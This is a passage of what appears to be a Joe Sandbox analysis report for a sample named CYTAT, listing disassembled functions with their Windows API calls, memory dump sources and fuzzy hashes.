                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLastacceptselect
                                                • String ID:
                                                • API String ID: 385091864-0
                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                • String ID:
                                                • API String ID: 1358664141-0
                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • __wsplitpath.LIBCMT ref: 00433950
                                                • __wcsicoll.LIBCMT ref: 00433974
                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                • String ID:
                                                • API String ID: 1187119602-0
                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                • String ID:
                                                • API String ID: 1597257046-0
                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                • String ID:
                                                • API String ID: 237123855-0
                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconWindow
                                                • String ID:
                                                • API String ID: 3349847261-0
                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                • String ID:
                                                • API String ID: 2223660684-0
                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                • EndPath.GDI32(?), ref: 00447336
                                                • StrokePath.GDI32(?), ref: 00447344
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                • String ID:
                                                • API String ID: 2783949968-0
                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                • __freeptd.LIBCMT ref: 0041516B
                                                • ExitThread.KERNEL32 ref: 00415173
